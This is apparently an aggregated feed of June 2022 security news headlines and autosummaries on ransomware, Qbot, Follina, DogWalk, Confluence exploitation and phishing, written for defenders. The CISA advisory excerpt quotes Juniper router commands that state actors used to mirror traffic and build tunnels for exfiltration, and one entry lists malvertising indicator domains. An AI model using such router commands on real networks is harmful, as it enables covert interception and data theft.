                Autosummary: (Figure: files encrypted by the Chaos ransomware variant; source BleepingComputer.) What makes the new WannaFriendMe ransomware stand out is that instead of demanding cryptocurrency as a ransom payment, it requires victims to purchase a decryptor from Roblox’s Game Pass store using Robux, as can be read in the ransom note. "


                Qbot – known channel for ransomware – delivered via phishing and Follina exploit

                financial exploits ransomware
                2022-06-08 https://www.helpnetsecurity.com/2022/06/08/qbot-follina-exploit/

                More than a week has passed since Microsoft acknowledged the existence of the “Follina” vulnerability (CVE-2022-30190), after reports of it being exploited in the wild began to crop up here and there. Since then, other state-backed threat actors have started exploiting it, but now one of the most active Qbot (QakBot) malware affiliates has also been spotted leveraging Follina. Archive contains an IMG with a Word doc, shortcut file, and DLL. The LNK will execute … More

                The post Qbot – known channel for ransomware – delivered via phishing and Follina exploit appeared first on Help Net Security.

                "

                Autosummary: Match following filename pattern: [0-9]{8}_[0-9]{6}.html https://t.co/xaKa60O3hW pic.twitter.com/L2MQ8vMfyQ — Ankit Anubhav (@ankit_anubhav) June 8, 2022. Follina exploitation leads to Qbot installation: setting aside for a moment the fact that Qbot is an effective information stealer and backdoor in its own right, this latest development should worry most organizations, as a variety of Ransomware-as-a-Service (RaaS) operators use Qbot to secure a foothold into corporate networks before deploying ransomware. "


                Paying Ransomware Paints Bigger Bullseye on Target’s Back

                exploits ransomware
                2022-06-08 https://threatpost.com/paying-ransomware-bullseye-back/179915/
                Ransomware attackers often strike targets twice, regardless of whether the ransom was paid. "

                Autosummary: “The fact that ransomware gangs strike so quickly a second and third time isn’t surprising, because they will try to profit in any possible way,” wrote Bill Keeler, senior director of global public relations at Cybereason, in a written exchange with Threatpost. "


                Black Basta Ransomware Teams Up with Malware Stalwart Qbot

                exploits ransomware
                2022-06-08 https://threatpost.com/black-basta-ransomware-qbot/179909/
                The novel cybercriminal group tapped the ever-evolving info-stealing trojan to move laterally on a network in a recent attack, researchers have found. "

                Autosummary: Black Basta, a ransomware group that emerged in April, leveraged Qbot (a.k.a. QakBot) to move laterally on a compromised network, researchers from security consulting firm NCC Group wrote in a blog post published this week. Once it’s deployed, Black Basta ransomware itself, like many ransomware variants, doesn’t encrypt the entire file, researchers found. "


                Black Basta ransomware now supports encrypting VMware ESXi servers

                exploits ransomware
                2022-06-08 https://securityaffairs.co/wordpress/132037/hacking/black-basta-ransomware-vmware-esxi.html

                The Black Basta ransomware gang has implemented a new feature to encrypt VMware ESXi virtual machines (VMs) running on Linux servers. Researchers from Uptycs first reported the discovery of the new Black Basta ransomware variant that supports encryption of […]

                The post Black Basta ransomware now supports encrypting VMware ESXi servers appeared first on Security Affairs.

                "

                Autosummary: "


                Pirated CCleaner search results spread information-stealing malware

                exploits
                2022-06-08 https://www.bleepingcomputer.com/news/security/pirated-ccleaner-search-results-spread-information-stealing-malware/
                Malware that steals your passwords, credit cards, and crypto wallets is being promoted through search results for a pirated copy of the CCleaner Pro Windows optimization program. [...] "

                Autosummary: This clipboard hijacking feature works with various cryptocurrency addresses, including those for Bitcoin, Ethereum, Cardano, Terra, Nano, Ronin, and Bitcoin Cash. "


                5 Linux malware families SMBs should protect themselves against

                exploits
                2022-06-08 https://blog.malwarebytes.com/business-2/2022/06/5-linux-malware-families-smbs-should-protect-themselves-against/

                In this post, we’ll give you an overview of five Linux malware families your SMB should be protecting itself against — and how they work.

                The post 5 Linux malware families SMBs should protect themselves against appeared first on Malwarebytes Labs.

                "

                Autosummary: From there, attackers can execute files, spy on computer usage, change system configurations, and so on — all while being unseen. Additionally, applying in-depth insights from our proprietary Linking Engine remediation technology, Malwarebytes thoroughly and permanently removes both the infection and any malware artifacts, delivering lethal “one-and-done” remediation. Stop Linux malware from getting a hold on your organization It may be true that Linux is more secure than most other operating systems, but make no mistake — Linux malware exists, and can have devastating effects on SMBs. "


                Emotet malware now steals credit cards from Google Chrome users

                exploits
                2022-06-08 https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-credit-cards-from-google-chrome-users/
                The Emotet botnet is now attempting to infect potential victims with a credit card stealer module designed to harvest credit card information stored in Google Chrome user profiles. [...] "

                Autosummary: After stealing the credit card info (i.e., name, expiration month and year, card numbers), the malware sends it to command-and-control (C2) servers that are different from the ones used by the Emotet card stealer module. "


                Cuba ransomware returns to extorting victims with updated encryptor

                exploits ransomware
                2022-06-08 https://www.bleepingcomputer.com/news/security/cuba-ransomware-returns-to-extorting-victims-with-updated-encryptor/
                The Cuba ransomware operation has returned to regular operations with a new version of its malware found used in recent attacks. [...] "

                Autosummary: While the updates to Cuba ransomware did not change much in terms of overall functionality, we have reason to believe that the updates aim to optimize its execution, minimize unintended system behavior, and provide technical support to the ransomware victims if they choose to negotiate. "


                Poisoned CCleaner search results spread information-stealing malware

                exploits
                2022-06-08 https://www.bleepingcomputer.com/news/security/poisoned-ccleaner-search-results-spread-information-stealing-malware/
                Malware that steals your passwords, credit cards, and crypto wallets is being promoted through search results for a pirated copy of the CCleaner Pro Windows optimization program. [...] "

                Autosummary: This clipboard hijacking feature works with various cryptocurrency addresses, including Bitcoin, Ethereum, Cardano, Terra, Nano, Ronin, and Bitcoin Cash addresses. "


                Researchers Warn of Unpatched "DogWalk" Microsoft Windows Vulnerability

                exploits
                2022-06-08 https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html
                An unofficial security patch has been made available for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), even as the Follina flaw continues to be exploited in the wild. The issue — referenced as DogWalk — relates to a path traversal flaw that can be exploited to stash a malicious executable file to the Windows Startup folder when a potential target opens a "

                Autosummary: " The patches and the renewed interest in the zero-day bug follow active exploitation of the "Follina" remote code execution vulnerability by leveraging malware-laced Word documents that abuse the "ms-msdt:" protocol URI scheme. "


                Linux botnets now exploit critical Atlassian Confluence bug

                exploits
                2022-06-08 https://www.bleepingcomputer.com/news/security/linux-botnets-now-exploit-critical-atlassian-confluence-bug/
                Several botnets are now using exploits targeting a critical remote code execution (RCE) vulnerability to infect Linux servers running unpatched Atlassian Confluence Server and Data Center installs. [...] "

                Autosummary: " Widely exploited, federal agencies ordered to mitigate Since it was disclosed as an actively exploited zero-day bug last week by cybersecurity firm Volexity, CISA has ordered federal agencies to block all internet traffic to Confluence servers on their networks. "


                Massive Facebook Messenger phishing operation generates millions

                financial
                2022-06-08 https://www.bleepingcomputer.com/news/security/massive-facebook-messenger-phishing-operation-generates-millions/
                Researchers have uncovered a large-scale phishing operation that abused Facebook and Messenger to lure millions of users to phishing pages, tricking them into entering their account credentials and seeing advertisements. [...] "

                Autosummary: [Image: Some of the URLs used in the phishing campaign (PIXM)] After discovering that they could gain unauthenticated access to the phishing campaign stats pages, the researchers found that in 2021, 2.7 million users had visited one of the phishing portals. "


                MakeMoney malvertising campaign adds fake update template

                financial
                2022-06-08 https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/

                We catch up with some old acquaintances that just aren't ready to hang up the towel just yet.

                The post MakeMoney malvertising campaign adds fake update template appeared first on Malwarebytes Labs.

                "

                Autosummary: 188.227.107.121 188.227.107.92 Domains (malvertising domains, gates) adcashtds2[.]xyz adcashtdssystem[.]site adsinside[.]xyz adsterramagic[.]me adstexx[.]xyz allmagnew[.]xyz alltomag[.]xyz an-era[.]shop ankgomag[.]xyz anklexit[.]online ankltrafficexit[.]xyz ankmagicgo[.]xyz blackexit[.]xyz ccgmaining[.]life ccgmaining[.]live ccgmaining[.]work clickadusweep[.]vip clickadusweeps[.]vip clickadutds[.]xyz clicksdeliveryserver[.]space clicktds2[.]xyz cryptomoneyinside[.]xyz cryptomoneyinsider[.]biz cryptomoneyinsider[.]link cryptomoneyinsider[.]site cryptomoneyinsider[.]work cryptomoneyinsiders[.]com cryptomoneyinsiders[.]site cryptomoneyinsiders[.]work cryptomoneytds[.]xyz cryptopaycard[.]shop cryptosuite[.]pro cryptosuitetds[.]com cryptotraffic[.]vip cryptotraffictds[.]online cryptotraffictdss[.]xyz cryptozerotds[.]xyz daiichisankyo-hc[.]live earncryptomoney[.]info exitmagall[.]xyz extradeliverytraffic[.]com extramoneymaker[.]vip familylabs[.]xyz fujimi[.]fun gettime[.]xyz hilldeliveryexit[.]xyz hillex[.]xyz hilllandings[.]xyz hillmag[.]xyz hillmagnew[.]xyz hilltopmagic[.]xyz hilltoptds[.]xyz hilltoptdsserver[.]xyz hilltoptdsservers[.]fun hilltoptrafficdelivery[.]com hilltoptrafficdelivery[.]xyz jillstuart-floranotisjillstu[.]art k-to-kd[.]me keitarotrafficdelivery[.]com keitarotrafficdelivery[.]xyz lahsahal[.]site magcheckall[.]me magicadss[.]xyz magicadsterra[.]xyz magicclickadu[.]xyz magickhill[.]xyz magickpeoplenew[.]xyz magicpopcash[.]xyz magicpropeller[.]xyz magicself[.]xyz magiczero[.]xyz makemoneyeazzywith[.]me makemoneynowwith[.]me makemoneywith[.]us makemoneywithus[.]work mizuno[.]casa money365[.]xyz myallexit[.]xyz myjobsy[.]com nawa-store[.]com newallfrommag[.]xyz newzamenaadc[.]xyz newzamenaclick[.]xyz newzamenaself[.]xyz newzamenazero[.]xyz nippon-mask[.]site northfarmstock[.]xyz offers[.]myjobsy[.]com offersstudioex[.]live openphoto[.]xyz partners[.]usemoney[.]xyz prelandingpages[.]xyz promodigital[.]me propellermagic[.]xyz 
sberbank[.]hourscareer[.]com sberjob[.]hourscareer[.]com selfadtracker1[.]online selfadtrackerexit[.]xyz selftraffictds[.]xyz selfyourads[.]xyz shop[.]mizuno[.]casa supersports[.]fun surprise[.]yousweeps[.]vip tracker[.]usemoney[.]xyz traffic[.]selfadtracker1[.]online traffic[.]usemoney[.]xyz trafficdeliveryclick[.]xyz trafficdeliveryoffers[.]com trafficdeliverysystem[.]world traffictrackerself[.]xyz tryphoto[.]xyz trytime[.]xyz usehouse[.]xyz usemoney[.]life usemoney[.]xyz ymalljp[.]com yousweeps[.]vip zamenaad[.]xyz zamenaclick[.]xyz zamenahil[.]xyz zamenazer[.]xyz zapasnoiadc[.]xyz zapasnoiclick[.]xyz zapasnoiself[.]xyz zapasnoizero[.]xyz zermag[.]xyz zernewmagcheck[.]xyz zerocryptocard[.]shop zeroexit[.]xyz zerok2exit[.]xyz zeroparktraffic[.]xyz zeroparktrakeroutside[.]shop zerotdspark[.]space zerotracker[.]shop References https://twitter.com/MBThreatIntel/status/1483235125827571715 https://twitter.com/MBThreatIntel/status/1361824286499950601 https://twitter.com/malware_traffic/status/1412128664721014785 https://twitter.com/malware_traffic/status/1357513424566124548 https://twitter.com/FaLconIntel/status/1351739449932083200 https://twitter.com/tkanalyst/status/1226125887256416256 https://twitter.com/david_jursa/status/1346562997305696262 https://twitter.com/nao_sec/status/1334289601125445633 https://twitter.com/FaLconIntel/status/1298661757943087105 https://twitter.com/nao_sec/status/1294871134001799168 https://twitter.com/david_jursa/status/1232996830520193024 https://twitter.com/david_jursa/status/1229354505583628288 https://twitter.com/nao_sec/status/1211975197219151876 "


                0Patch released unofficial security patch for new DogWalk Windows zero-day

                exploits
                2022-06-08 https://securityaffairs.co/wordpress/132070/hacking/unofficial-security-patch-dogwalk.html

                0patch researchers released an unofficial security patch for a Windows zero-day vulnerability dubbed DogWalk. 0patch released an unofficial security patch for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT) dubbed DogWalk. The issue impacts all Windows versions, starting from Windows 7 and Server 2008, including the latest releases. The flaw […]

                The post 0Patch released unofficial security patch for new DogWalk Windows zero-day appeared first on Security Affairs.

                "

                Autosummary: “During this process, it enumerates files in attacker’s folder, gets the file name for each of them, then glues together the local temporary path and that file name to generate the local path on the computer where the file is to be created.” "


                Linux version of Black Basta ransomware targets VMware ESXi servers

                exploits ransomware
                2022-06-07 https://www.bleepingcomputer.com/news/security/linux-version-of-black-basta-ransomware-targets-vmware-esxi-servers/
                Black Basta is the latest ransomware gang to add support for encrypting VMware ESXi virtual machines running on enterprise Linux servers. [...] "

                Autosummary: Emsisoft CTO Fabian Wosar has previously told BleepingComputer that other ransomware gangs (besides the ones we reported on), including Babuk, RansomExx/Defray, Mespinoza, GoGoogle, Snatch, PureLocker, and DarkSide, have also developed and used their own Linux encryptors. "


                Shields Health Care Group data breach affects 2 million patients

                financial
                2022-06-07 https://www.bleepingcomputer.com/news/security/shields-health-care-group-data-breach-affects-2-million-patients/
                Shields Health Care Group (Shields) suffered a data breach that exposed the data of approximately 2,000,000 people in the United States after hackers breached their network and stole data. [...] "

                Autosummary: "


                Evil Corp Cybercrime Group Shifts to LockBit Ransomware to Evade Sanctions

                exploits ransomware
                2022-06-07 https://thehackernews.com/2022/06/evil-corp-cybercrime-group-shifts-to.html
                The threat cluster dubbed UNC2165, which shares numerous overlaps with a Russia-based cybercrime group known as Evil Corp, has been linked to multiple LockBit ransomware intrusions in an attempt to get around sanctions imposed by the U.S. Treasury in December 2019. "These actors have shifted away from using exclusive ransomware variants to LockBit — a well-known ransomware as a service (RaaS) — "

                Autosummary: Mandiant said it noted further similarities between UNC2165 and an Evil Corp-connected cyber espionage activity tracked by Swiss cybersecurity firm PRODAFT under the name SilverFish aimed at government entities and Fortune 500 companies in the E.U. and the U.S. A successful initial compromise is followed by a string of actions as part of the attack lifecycle, including privilege escalation, internal reconnaissance, lateral movement, and maintaining long-term remote access, before delivering the ransomware payloads. "


                Researchers Warn of Spam Campaign Targeting Victims with SVCReady Malware

                exploits
                2022-06-07 https://thehackernews.com/2022/06/researchers-warn-of-spam-campaign.html
                A new wave of phishing campaigns has been observed spreading a previously documented malware called SVCReady. "The malware is notable for the unusual way it is delivered to target PCs — using shellcode hidden in the properties of Microsoft Office documents," Patrick Schläpfer, a threat analyst at HP, said in a technical write-up. SVCReady is said to be in its early stage of development, with the "

                Autosummary: "


                Follina Exploited by State-Sponsored Hackers

                exploits government
                2022-06-07 https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/
                A government-aligned attacker tried using a Microsoft vulnerability to attack U.S. and E.U. government targets. "

                Autosummary: Proofpoint says the malicious file used in the recruitment phishing campaigns, if downloaded, executes a script that can ultimately check for virtualized environment to abuse and “steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil.” "


                Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw

                exploits
                2022-06-07 https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/
                The vulnerability remains unpatched on many versions of the collaboration tool and has potential to create a SolarWinds-type scenario. "

                Autosummary: A day later, Atlassian released an update that fixes the following versions of the affected products: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1; it’s also strongly recommending that customers update as soon as they can. "


                Evil Corp gang starts using LockBit Ransomware to evade sanctions

                exploits ransomware
                2022-06-07 https://securityaffairs.co/wordpress/132031/cyber-crime/evil-corp-lockbit-ransomware.html

                Mandiant researchers associate multiple LockBit ransomware attacks with the notorious Evil Corp Cybercrime Group. Mandiant researchers have investigated multiple LOCKBIT ransomware attacks that have been attributed to the financially motivated threat actor UNC2165. The researchers also noticed that the group shares numerous overlaps with the cybercrime gang Evil Corp. The UNC2165 group has been active since at […]

                The post Evil Corp gang starts using LockBit Ransomware to evade sanctions appeared first on Security Affairs.

                "

                Autosummary: "


                Black Basta ransomware operators leverage QBot for lateral movements

                exploits ransomware
                2022-06-07 https://securityaffairs.co/wordpress/132018/hacking/black-basta-ransomware-qbot.html

                The QBot malware operation has partnered with the Black Basta ransomware group to target organizations worldwide. Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware operation. Black Basta has been active since April 2022; like other ransomware operations, it implements a double-extortion attack […]

                The post Black Basta ransomware operators leverage QBot for lateral movements appeared first on Security Affairs.

                "

                Autosummary: "


                Qbot malware now uses Windows MSDT zero-day in phishing attacks

                financial exploits
                2022-06-07 https://www.bleepingcomputer.com/news/security/qbot-malware-now-uses-windows-msdt-zero-day-in-phishing-attacks/
                A critical Windows zero-day vulnerability, known as Follina and still waiting for an official fix from Microsoft, is now being actively exploited in ongoing phishing attacks to infect recipients with Qbot malware. [...] "

                Autosummary: Ransomware affiliates linked to multiple Ransomware as a Service (RaaS) operations (including REvil, PwndLocker, Egregor, ProLock, and MegaCortex) have also used Qbot for initial access into corporate networks. "


                Ransomware Task Force priorities see progress in first year

                exploits
                2022-06-07 https://blog.malwarebytes.com/ransomware/2022/06/ransomware-task-force-priorities-see-progress-in-first-year/

                The Ransomware Task Force's five priority recommendations, issued last year, have all seen encouraging progress from governments.

                The post Ransomware Task Force priorities see progress in first year appeared first on Malwarebytes Labs.

                "

                Autosummary: In June 2021, Ukrainian law enforcement worked with investigators from South Korea to arrest members affiliated with the Clop ransomware gang, and months later, members of the FBI, the French National Gendarmerie, and the Ukrainian National Police arrested two individuals—and seized about $2 million—from an unnamed ransomware group. “I can see the US government trying to, internationally, build a collation of countries—not just US agencies, but multiple agencies across multiple jurisdictions at the same time,” Daniels said. "


                New SVCReady malware loads from Word doc properties

                exploits
                2022-06-07 https://www.bleepingcomputer.com/news/security/new-svcready-malware-loads-from-word-doc-properties/
                A previously unknown malware loader named SVCReady has been discovered in phishing attacks, featuring an unusual way of loading the malware from Word documents onto compromised machines. [...] "

                Autosummary: The functions supported by SVCReady at this time are the following:
                • Download a file to the infected client
                • Take a screenshot
                • Run a shell command
                • Check if it is running in a virtual machine
                • Collect system information (a short and a "normal" version)
                • Check the USB status, i.e., the number of devices plugged in
                • Establish persistence through a scheduled task
                • Run a file
                • Run a file using RunPeNative in memory
                Finally, the malware can also fetch additional payloads. "


                AA22-158A: People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

                exploits government
                2022-06-07 https://us-cert.cisa.gov/ncas/alerts/aa22-158a
                Original release date: June 7, 2022

                Summary

                Best Practices
                • Apply patches as soon as possible
                • Disable unnecessary ports and protocols
                • Replace end-of-life infrastructure
                • Implement a centralized patch management system

                This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.

                This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

                Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.

                NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.

                For more information on PRC state-s "

                Autosummary: set forwarding-options port-mirroring family inet output no-filter-check
                set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
                set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
                Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection. While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:
                set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
                set chassis network-services all-ethernet
                set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
                Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors
                Vendor     CVE              Vulnerability Type
                Cisco      CVE-2018-0171    Remote Code Execution
                           CVE-2019-15271   RCE
                           CVE-2019-1652    RCE
                Citrix     CVE-2019-19781   RCE
                DrayTek    CVE-2020-8515    RCE
                D-Link     CVE-2019-16920   RCE
                Fortinet   CVE-2018-13382   Authentication Bypass
                MikroTik   CVE-2018-14847   Authentication Bypass
                Netgear    CVE-2017-6862    RCE
                Pulse      CVE-2019-11510   Authentication Bypass
                           CVE-2021-22893   RCE
                QNAP       CVE-2019-7192    Privilege Elevation
                           CVE-2019-7193    "


                New ‘DogWalk’ Windows zero-day bug gets free unofficial patches

                exploits
                2022-06-07 https://www.bleepingcomputer.com/news/security/new-dogwalk-windows-zero-day-bug-gets-free-unofficial-patches/
                Free unofficial patches for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT) have been released today through the 0patch platform.  [...] "

                Autosummary: Unofficial patches available for affected Windows systems. Until Microsoft releases official security updates to address this zero-day bug, the 0patch micropatching service has developed free and unofficial patches for most affected Windows versions: Windows 11 v21H2; Windows 10 (v1803 to v21H2); Windows 7; Windows Server 2008 R2 "


                Cybersecurity awareness training: What is it and what works best?

                ciber
                2022-06-07 https://www.welivesecurity.com/2022/06/07/cybersecurity-awareness-training-what-is-it-what-works-best/

                Give employees the knowledge needed to spot the warning signs of a cyberattack and to understand when they may be putting sensitive data at risk

                The post Cybersecurity awareness training: What is it and what works best? appeared first on WeLiveSecurity

                "

                Autosummary: Among the areas to cover could be:
                • Social engineering and phishing/vishing/smishing
                • Accidental disclosure via email
                • Web protection (safe searching and use of public Wi-Fi)
                • Password best practices and multi-factor authentication
                • Safe remote and home working
                • How to spot insider threats
                Above all, bear in mind that lessons should be:
                • Fun and gamified (think positive reinforcement rather than fear-based messages)
                • Based around real-world simulation exercises
                • Run continuously throughout the year in short lessons (10-15 minutes)
                • Inclusive of every staff member including executives, part-timers and contractors
                • Able to generate results which can be used to adjust programs to suit individual needs
                • Tailored to suit different roles
                Once all this is decided, it’s important to find the right training provider. Ultimately, a serious security breach, whether resulting from third-party attack or an accidental data disclosure, could result in major financial and reputational damage. "


                FBI warns of scammers soliciting donations for Ukraine

                financial
                2022-06-06 https://blog.malwarebytes.com/awareness/2022/06/fbi-warns-of-scammers-soliciting-donations-for-ukraine/

                Fraudulent donation sites using our sympathy for Ukraine seem to be on the rise. Know how to protect yourself!

                The post FBI warns of scammers soliciting donations for Ukraine appeared first on Malwarebytes Labs.

                "

                Autosummary: Days before May, our Threat Intelligence team spotted a fake USA for UNHCR (United Nations High Commission for Refugees) website, which was part of a phishing campaign that started as a spam email using a spoofed address, calling on recipients to donate to Ukraine. "


                10 Most Prolific Banking Trojans Targeting Hundreds of Financial Apps with Over a Billion Users

                financial exploits
                2022-06-06 https://thehackernews.com/2022/06/10-most-prolific-banking-trojans.html
                10 of the most prolific mobile banking trojans have set their eyes on 639 financial applications that are available on the Google Play Store and have been cumulatively downloaded over 1.01 billion times. Some of the most targeted apps include Walmart-backed PhonePe, Binance, Cash App, Garanti BBVA Mobile, La Banque Postale, Ma Banque, Caf - Mon Compte, Postepay, and BBVA México. These apps alone "

                Autosummary: Of the 639 apps tracked, 121 are based in the U.S., followed by the U.K. (55), Italy (43), Turkey (34), Australia (33), France (31), Spain (29), and Portugal (27). "


                Microsoft Seizes 41 Domains Used in Spear-Phishing Attacks by Bohrium Hackers

                financial
                2022-06-06 https://thehackernews.com/2022/06/microsoft-seizes-41-domains-used-in.html
                Microsoft's Digital Crimes Unit (DCU) last week disclosed that it had taken legal proceedings against an Iranian threat actor dubbed Bohrium in connection with a spear-phishing operation. The adversarial collective is said to have targeted entities in tech, transportation, government, and education sectors located in the U.S., Middle East, and India. "Bohrium actors create fake "

                Autosummary: "


                RSA 2022: Prometheus ransomware’s flaws inspired researchers to try to build a near-universal decryption tool

                exploits ransomware
                2022-06-06 https://blog.malwarebytes.com/security-world/2022/06/rsa-2022-prometheus-ransomwares-flaws-inspired-researchers-to-try-to-build-a-near-universal-decryption-tool/

                Prometheus ransomware contained a weak random number generator that inspired researchers to try and build a one-size-fits-all decryptor.

                The post RSA 2022: Prometheus ransomware’s flaws inspired researchers to try to build a near-universal decryption tool appeared first on Malwarebytes Labs.

                "

                Autosummary: Prometheus—a ransomware build based on Thanos that locked up victims’ computers in the summer of 2021—included a major “vulnerability” that led security researchers at IBM to try and build a one-size-fits-all ransomware decryptor that could work against multiple ransomware variants, including Prometheus, AtomSilo, LockFile, Bandana, Chaos, and PartyTicket. "


                State-Backed Hackers Exploit Microsoft "Follina" Bug to Target Entities in Europe and U.S

                exploits government
                2022-06-06 https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html
                A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S. Enterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked as CVE-2022-30190 (CVSS score: 7.8). No less than 1,000 phishing messages "

                Autosummary: "


                Lockbit ransomware gang claims to have hacked cybersecurity giant Mandiant

                exploits ransomware
                2022-06-06 https://securityaffairs.co/wordpress/132011/cyber-crime/lockbit-claims-mandiant-hack.html

                LockBit ransomware gang claims to have hacked the cybersecurity firm Mandiant, which is investigating the alleged security breach. Today the LockBit ransomware gang has added the cybersecurity firm Mandiant to the list of victims published on its darkweb leak site. Mandiant is investigating the claims of the ransomware gang, the cybercrime group declared to have […]

                The post Lockbit ransomware gang claims to have hacked cybersecurity giant Mandiant appeared first on Security Affairs.

                "

                Autosummary: "


                Another nation-state actor exploits Microsoft Follina to attack European and US entities

                exploits government
                2022-06-06 https://securityaffairs.co/wordpress/131992/apt/nation-state-actors-follina-exploits.html

                A nation-state actor is attempting to exploit the Follina flaw in a recent wave of attacks against government entities in Europe and the U.S. An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability in attacks aimed at government entities in Europe and the U.S. On May 31, Microsoft released […]

                The post Another nation-state actor exploits Microsoft Follina to attack European and US entities appeared first on Security Affairs.

                "

                Autosummary: the U.S. An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability in attacks aimed at government entities in Europe and the U.S. On May 31, Microsoft released workarounds for a recently discovered zero-day vulnerability, dubbed Follina and tracked as CVE-2022-30190 (CVSS score 7.8), in the Microsoft Office productivity suite. "


                Exclusive: Pro-Russia group ‘Cyber Spetsnaz’ is attacking government agencies

                government
                2022-06-06 https://securityaffairs.co/wordpress/131967/hacking/exclusive-pro-russia-cyber-spetsnaz-is-attacking-government-agencies.html

                Resecurity, Inc. (USA) has identified an increase in activity within hacktivist groups conducted by a new group called “Cyber Spetsnaz”. Resecurity, Inc. (USA) has identified an increase in activity within hacktivist groups, which are leveraging current geopolitical tensions between Ukraine and Russia to perform cyber-attacks. Following the attacks of the Killnet Collective, the group responsible […]

                The post Exclusive: Pro-Russia group ‘Cyber Spetsnaz’ is attacking government agencies appeared first on Security Affairs.

                "

                Autosummary: Other divisions involved in the DDoS attacks included “Vera”, “FasoninnGung”, “Mirai”, “Jacky”, “DDOS Gung” and “Sakurajima”, who previously attacked multiple web resources in Germany. Around April, “Cyber Spetsnaz” built one of its first divisions, called “Zarya”; they looked for experienced penetration testers, OSINT specialists, and hackers. Around this time the group performed one of their first coordinated attacks against NATO. "


                PoC exploits for Atlassian CVE-2022-26134 RCE flaw released online

                exploits
                2022-06-05 https://securityaffairs.co/wordpress/131961/hacking/atlassian-cve-2022-26134-rce-poc.html

                Proof-of-concept exploits for the critical CVE-2022-26134 vulnerability in Atlassian Confluence and Data Center servers are available online. Proof-of-concept exploits for the critical CVE-2022-26134 flaw, affecting Atlassian Confluence and Data Center servers, have been released. Bleeping Computer reported that starting from Friday afternoon, a proof-of-concept exploit for this issue was publicly shared. Researchers from cybersecurity firm […]

                The post PoC exploits for Atlassian CVE-2022-26134 RCE flaw released online appeared first on Security Affairs.

                "

                Autosummary: Atlassian on Friday released security fixes to address the CVE-2022-26134 vulnerability in the following versions of the software: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1. IoT search engine Censys has found around 9,325 services across 8,347 distinct hosts running some version of Atlassian Confluence. Because you should apply a trial license from Atlassian😂#vulhub pic.twitter.com/CS1EVOHbKg — Phith0n (@phithon_xg) June 4, 2022 Early this week, Atlassian warned of a critical unpatched remote code execution vulnerability affecting all Confluence Server and Data Center supported versions, tracked as CVE-2022-26134, that is being actively exploited in attacks in the wild. "


                Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild

                exploits
                2022-06-04 https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html
                Atlassian on Friday rolled out fixes to address a critical security flaw affecting its Confluence Server and Data Center products that has come under active exploitation by threat actors to achieve remote code execution. Tracked as CVE-2022-26134, the issue is similar to CVE-2021-26084 — another security flaw the Australian software company patched in August 2021. Both relate to a case of "

                Autosummary: "


                Critical UNISOC Chip Vulnerability Affects Millions of Android Smartphones

                exploits
                2022-06-04 https://thehackernews.com/2022/06/critical-unisoc-chip-vulnerability.html
                A critical security flaw has been uncovered in UNISOC's smartphone chipset that could be potentially weaponized to disrupt a smartphone's radio communications through a malformed packet. "Left unpatched, a hacker or a military unit can leverage such a vulnerability to neutralize communications in a specific location," Israeli cybersecurity company Check Point said in a report shared with The "

                Autosummary: "


                Ransomware: May 2022 review

                exploits
                2022-06-03 https://blog.malwarebytes.com/threat-intelligence/2022/06/ransomware-may-2022-review/

                May 2022 saw the continued dominance of LockBit, and a possible disbursement of the Conti gang into other ransomware groups.

                The post Ransomware: May 2022 review appeared first on Malwarebytes Labs.

                "

